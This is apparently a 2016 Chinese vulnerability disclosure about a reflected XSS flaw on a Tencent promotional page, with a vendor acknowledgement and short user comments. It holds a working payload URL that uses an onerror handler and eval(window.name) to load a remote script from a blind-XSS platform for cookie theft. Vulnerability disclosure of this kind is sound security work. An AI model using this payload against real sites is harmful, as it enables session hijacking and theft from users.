腾讯某处黑产在用XSS跨站漏洞可窃取cookie

http://gd.qq.com/zt2015/clxyy/index.htm

反射类型的xss

http://gd.qq.com/zt2015/clxyy/index.htm#<img src=x.jpg onerror=eval(window.name)>" name="$.getScript('盲打平台的js文件的地址')

你比我明白

厂商回应：

危害等级：低

漏洞Rank：1

确认时间：2016-03-28 15:46

厂商回复：

非常感谢您的报告，问题已着手处理，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理。

最新状态：

暂无

1. 2016-03-28 09:30 | 孤梦° ( 普通白帽子 | Rank:149 漏洞数:51 )

   2

   前排

   1# 回复此人

2. 2016-03-28 09:41 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀，伊雅伊尔哟。)

   1

   瓜子。

   2# 回复此人

3. 2016-03-28 09:42 | cnsolu ( 路人 | Rank:22 漏洞数:8 )

   1

   前两天扑捉到一个，不知道是不是同一个

   3# 回复此人

4. 2016-03-28 09:44 | 蜗牛也是牛 ( 路人 | Rank:5 漏洞数:1 | 黑客、红客、白客... 我只是一个看客！)

   1

   mark

   4# 回复此人

5. 2016-03-28 10:09 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)

   1

   @cnsolu 怎么抓的啊！

   5# 回复此人

6. 2016-03-28 10:21 | cnsolu ( 路人 | Rank:22 漏洞数:8 )

   1

   @px1624 钓鱼站在用一些邮箱的漏洞

   6# 回复此人

7. 2016-04-12 10:36 | 0xev4l ( 路人 | Rank:0 漏洞数:1 )

   1

   前两天扑捉到一个，不知道是不是同一个

   7# 回复此人

8. 2016-04-22 16:44 | Budi ( 普通白帽子 | Rank:213 漏洞数:44 | 希望能成为一个合格的白帽子，不断完善自己...)

   0

   疼讯，太抠，只给你1Rank

   8# 回复此人